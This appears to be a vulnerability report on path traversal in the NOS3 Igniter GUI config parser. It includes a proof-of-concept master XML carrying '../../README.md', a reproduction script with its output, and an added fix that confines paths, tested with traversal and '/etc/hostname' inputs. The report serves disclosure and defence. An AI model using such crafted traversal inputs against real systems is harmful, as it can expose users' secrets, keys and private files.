Description
Define the problem
The Igniter GUI master config parser reads sc-x-cfg values from a user-selected XML file and opens
child files using direct path concatenation, without canonicalization or directory confinement.
This allows ../ traversal to escape the selected config directory and read arbitrary local files
readable by the current user.
Relevant code:
- cfg_gui_main.py:304
- cfg_gui_main.py:306:306
- cfg_gui_main.py:311:311
Capture the setup
- Branch: main
- Git hash: 4428de5
- Configuration changes:
- Created temporary PoC file: tmp_gui_traversal_poc/inner/master.xml
- Set ../../README.md in that file
- No persistent source/config changes were required
Steps to recreate
- Create a crafted master config:
mkdir -p tmp_gui_traversal_poc/inner
cat > tmp_gui_traversal_poc/inner/master.xml <<'XML'
1
../../README.md
XML
- Reproduce using the same path logic as target code:
python3 - <<'PY'
from pathlib import Path
import xml.etree.ElementTree as ET
master=Path('tmp_gui_traversal_poc/inner/master.xml')
config_path=str(master)
# Directory derived by string split, then joined with the child value unchecked
config_dir=str(config_path.rsplit('/',1)[0])
child=[c.text for c in ET.parse(config_path).getroot() if c.tag=='sc-1-cfg'][0]
candidate=Path(f'{config_dir}/{child}')
# resolve() shows where the concatenated path really points
print('resolved=', candidate.resolve())
print('is_file=', candidate.is_file())
if candidate.is_file():
    print('preview=', candidate.read_text(encoding='utf-8',errors='ignore').splitlines()[0])
PY
Logs or screenshots
Observed output:
- resolved= /home/swift/nos3/README.md
- is_file= True
- preview= # NASA Operational Simulator for Space Systems (NOS3)
Impact
An attacker who can convince an operator to open a crafted master XML can disclose arbitrary local
files (secrets, tokens, keys, internal configs, source files), causing a confidentiality breach.
———
OS
No response
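One way to confine child config paths to the directory of the selected master file, as an added example (not code from the NOS3 project or from this report). The function names, the `example-root` tag and the `sc-2-cfg`/`sc-3-cfg` entries are assumptions made for the illustration.

```python
import tempfile
import xml.etree.ElementTree as ET
from pathlib import Path


def resolve_child_config(master_path, child_value):
    """Return the canonical child path, or raise ValueError if it leaves the master's directory."""
    base = Path(master_path).resolve().parent
    if not child_value or not child_value.strip():
        raise ValueError("empty child config path")
    # An absolute child_value replaces base in the join; resolve() collapses
    # ../ and follows symlinks, so the check below sees the real target.
    candidate = (base / child_value.strip()).resolve()
    try:
        candidate.relative_to(base)
    except ValueError:
        raise ValueError(f"{child_value!r} resolves outside {base}") from None
    return candidate


def check_master(master_path):
    """Map each sc-*-cfg tag to its confined path, or to the rejection reason."""
    results = {}
    for el in ET.parse(master_path).getroot():
        if el.tag.startswith("sc-") and el.tag.endswith("-cfg"):
            try:
                results[el.tag] = resolve_child_config(master_path, el.text)
            except ValueError as exc:
                results[el.tag] = f"rejected: {exc}"
    return results


def demo():
    """Run the check on a constructed master file (root tag name is made up)."""
    with tempfile.TemporaryDirectory() as tmp:
        inner = Path(tmp, "inner")
        inner.mkdir()
        (inner / "sc1.xml").write_text("<cfg/>", encoding="utf-8")
        master = inner / "master.xml"
        master.write_text(
            "<example-root>"
            "<sc-1-cfg>../../README.md</sc-1-cfg>"
            "<sc-2-cfg>sc1.xml</sc-2-cfg><sc-3-cfg>/etc/hostname</sc-3-cfg>"
            "</example-root>", encoding="utf-8")
        return {tag: str(val) for tag, val in check_master(master).items()}


if __name__ == "__main__":
    print(demo())
```

The check runs on the resolved path rather than on the raw string, so `../` sequences, absolute paths and symlinks pointing outside the directory are all rejected the same way.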